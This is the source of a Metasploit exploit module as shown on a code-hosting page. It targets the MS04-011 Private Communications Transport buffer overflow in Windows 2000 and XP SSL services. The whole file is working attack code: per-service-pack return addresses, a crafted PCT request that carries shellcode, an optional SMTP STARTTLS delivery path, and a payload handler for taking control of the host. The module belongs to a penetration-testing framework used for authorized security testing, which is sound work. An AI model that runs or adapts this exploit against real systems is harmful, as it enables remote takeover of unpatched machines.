Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/ssl/ms04_011_pct.rb
19592 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = AverageRanking

8


9
  include Msf::Exploit::Remote::Tcp

10


11
  def initialize(info = {})

12
    super(

13
      update_info(

14
        info,

15
        'Name' => 'MS04-011 Microsoft Private Communications Transport Overflow',

16
        'Description' => %q{

17
          This module exploits a buffer overflow in the Microsoft

18
          Windows SSL PCT protocol stack. This code is based on Johnny

19
          Cyberpunk's THC release and has been tested against Windows

20
          2000 and Windows XP. To use this module, specify the remote

21
          port of any SSL service, or the port and protocol of an

22
          application that uses SSL. The only application protocol

23
          supported at this time is SMTP. You only have one chance to

24
          select the correct target, if you are attacking IIS, you may

25
          want to try one of the other exploits first (WebDAV). If

26
          WebDAV does not work, this more than likely means that this

27
          is either Windows 2000 SP4+ or Windows XP (IIS 5.0 vs IIS

28
          5.1). Using the wrong target may not result in an immediate

29
          crash of the remote system.

30
        },

31
        'Author' => [ 'hdm' ],

32
        'License' => MSF_LICENSE,

33
        'References' => [

34
          [ 'CVE', '2003-0719'],

35
          [ 'OSVDB', '5250'],

36
          [ 'BID', '10116'],

37
          [ 'MSB', 'MS04-011'],

38
          ['ATT&CK', Mitre::Attack::Technique::T1059_COMMAND_AND_SCRIPTING_INTERPRETER],

39
          ['ATT&CK', Mitre::Attack::Technique::T1068_EXPLOITATION_FOR_PRIVILEGE_ESCALATION]

40
        ],

41
        'Privileged' => true,

42
        'DefaultOptions' => {

43
          'EXITFUNC' => 'thread',

44
        },

45
        'Payload' => {

46
          'Space' => 1800,

47
          'BadChars' => "",

48
          'StackAdjustment' => -3500,

49
        },

50
        'Platform' => 'win',

51
        'Targets' => [

52
          [

53
            'Windows 2000 SP4',

54
            {

55
              'Platform' => 'win',

56
              'Ret' => 0x67419ce8, # jmp [esp + 0x6c]

57
            },

58
          ],

59
          [

60
            'Windows 2000 SP3',

61
            {

62
              'Platform' => 'win',

63
              'Ret' => 0x67419e1d, # jmp [esp + 0x6c]

64
            },

65
          ],

66
          [

67
            'Windows 2000 SP2',

68
            {

69
              'Platform' => 'win',

70
              'Ret' => 0x6741a426, # jmp [esp + 0x6c]

71
            },

72
          ],

73
          [

74
            'Windows 2000 SP1',

75
            {

76
              'Platform' => 'win',

77
              'Ret' => 0x77e4f44d, # jmp [ebx + 0x14]

78
            },

79
          ],

80
          [

81
            'Windows 2000 SP0',

82
            {

83
              'Platform' => 'win',

84
              'Ret' => 0x7658a6cb, # jmp [ebx + 0x0e]

85
            },

86
          ],

87
          [

88
            'Windows XP SP0',

89
            {

90
              'Platform' => 'win',

91
              'Ret' => 0x0ffb7de9, # jmp [esp + 0x6c]

92
            },

93
          ],

94
          [

95
            'Windows XP SP1',

96
            {

97
              'Platform' => 'win',

98
              'Ret' => 0x0ffb832f, # jmp [esp + 0x6c]

99
            },

100
          ],

101
        ],

102
        'DisclosureDate' => '2004-04-13',

103
        'DefaultTarget' => 0,

104
        'Notes' => {

105
          'Reliability' => UNKNOWN_RELIABILITY,

106
          'Stability' => UNKNOWN_STABILITY,

107
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

108
        }

109
      )

110
    )

111


112
    register_options(

113
      [

114
        OptString.new('PROTO', [true, "The application protocol: raw or smtp", "raw"])

115
      ]

116
    )

117
  end

118


119
  def exploit

120
    begin

121
      connect

122
    rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused => e

123
      print_error("Cannot connect: #{e.message}")

124
      return

125
    end

126


127
    print_status("Trying target #{target.name} with proto #{datastore['PROTO']}...")

128


129
    # This is a heap ptr to the ssl request

130
    # ... and just happens to not die ...

131
    # Thanks to CORE and Halvar

132
    #

133
    #   80620101     =>  and byte ptr [esi+1], 0x2

134
    #   bd00010001   =>  mov ebp, 0x1000100

135
    #   0016         =>  add [esi], dl

136
    #   8f8201000000 =>  pop [esi+1]

137
    #   eb0f         =>  jmp short 11 to shellcode

138


139
    buf = "\x80\x66\x01\x02\xbd\x00\x01\x00\x01\x00\x16\x8f\x86\x01\x00\x00\x00" +

140
          "\xeb\x0f" + 'XXXXXXXXXXX' +

141
          [target.ret ^ 0xffffffff].pack('V') +

142
          payload.encoded

143


144
    # Connect to a SMTP service, call STARTTLS

145
    if (datastore['PROTO'] == 'smtp')

146
      begin

147
        greeting = sock.get_once

148
      rescue ::EOFError => e

149
        print_error("Failed to receive data for the protocol greeting: #{e.message}")

150
        return

151
      end

152


153
      begin

154
        sock.put('HELO ' + (rand_text_alphanumeric(rand(10) + 1)) + "\r\n")

155
        resp = sock.get_once

156
      rescue ::Timeout::Error

157
        print_error("Timedout while sending HELO")

158
        return

159
      rescue ::EOFError => e

160
        print_error("Failed to receive a response for HELO: #{e.message}")

161
        return

162
      end

163


164
      begin

165
        sock.put("STARTTLS\r\n")

166
        resp = sock.get_once

167
      rescue ::Timeout::Error

168
        print_error("Timed out while sending STARTTLS")

169
        return

170
      rescue ::EOFError => e

171
        print_error("Failed to receive a response for STARTTLS: #{e.message}")

172
        return

173
      end

174


175
      if (resp and resp !~ /^220/)

176
        print_warning("Warning: this server may not support STARTTLS")

177
      end

178
    end

179


180
    begin

181
      sock.put(buf)

182
      resp = sock.get_once

183
    rescue ::Timeout::Error => e

184
      print_error("Timed out while sending the malicious data")

185
      return

186
    rescue ::EOFError => e

187
      print_error("Failed to receive a response after the malicious data: #{e.message}")

188
      return

189
    end

190


191
    if (resp == "\x00\x00\x01")

192
      print_status("The response indicates that the PCT protocol is disabled")

193
    end

194


195
    handler

196
    disconnect

197
  end

198
end

199


200